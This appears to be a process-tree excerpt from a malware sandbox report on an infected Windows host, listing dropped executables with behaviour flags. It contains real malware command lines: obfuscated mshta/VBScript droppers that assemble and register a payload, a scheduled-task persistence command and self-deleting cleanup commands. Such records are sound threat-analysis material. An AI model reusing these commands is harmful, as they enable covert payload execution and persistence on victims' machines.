C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 7607⤵
- Program crash
-
C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe"C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe"6⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru7⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3b474f50,0x7ffa3b474f60,0x7ffa3b474f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1788 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1840 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:18⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3344 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3520 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4168 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings8⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff75d95a890,0x7ff75d95a8a0,0x7ff75d95a8b09⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3476 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3388 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=724 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:88⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\25D.exeC:\Users\Admin\AppData\Local\Temp\25D.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 25D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\25D.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 25D.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\335C.exe" /f2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\3745.exeC:\Users\Admin\AppData\Local\Temp\3745.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3C96.exeC:\Users\Admin\AppData\Local\Temp\3C96.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4590.exeC:\Users\Admin\AppData\Local\Temp\4590.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\DFFC.exeC:\Users\Admin\AppData\Local\Temp\DFFC.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im DFFC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DFFC.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im DFFC.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\E3F5.exeC:\Users\Admin\AppData\Local\Temp\E3F5.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" ) do taskkill /Im "%~nxE" -F3⤵
-
C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXEwIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If ""/PgRbPZTUXQ3fqTxJ5RJVzdoK5t "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "/PgRbPZTUXQ3fqTxJ5RJVzdoK5t " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" ) do taskkill /Im "%~nxE" -F6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIpt: clOSE ( CReatEObjecT ("WSCRipt.ShElL"). RUN( "C:\Windows\system32\cmd.exe /q /C eCHO fx46oC:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;g9q> fHUZ28V.I0 & ECho | sET /p = ""MZ"" > PD~PO.Fu& Copy /y /B PD~PO.FU + 7KUTL.Vbk + FDiJ.1V + ShUJ.ChH +fHuZ28V.I0 m9HEkzA.2 & sTArT regsvr32.exe /U -S m9HEkZA.2 " , 0, TrUE) )5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "E3F5.exe" -F4⤵
- Kills process with taskkill
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\4158.exeC:\Users\Admin\AppData\Local\Temp\4158.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\42A1.exeC:\Users\Admin\AppData\Local\Temp\42A1.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp"C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp" /SL5="$402A8,172303,88576,C:\Users\Admin\AppData\Local\Temp\42A1.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec73⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe"C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp" /SL5="$B035C,5808768,66560,C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT5⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵
-
C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe"C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe"4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe"C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lb5l3mzl.5wu\GcleanerEU.exe /eufive & exit5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exeC:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe6⤵
-
C:\Users\Admin\AppData\Roaming\7597109.exe"C:\Users\Admin\AppData\Roaming\7597109.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\5145379.exe"C:\Users\Admin\AppData\Roaming\5145379.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6009216.exe"C:\Users\Admin\AppData\Roaming\6009216.exe"7⤵
-
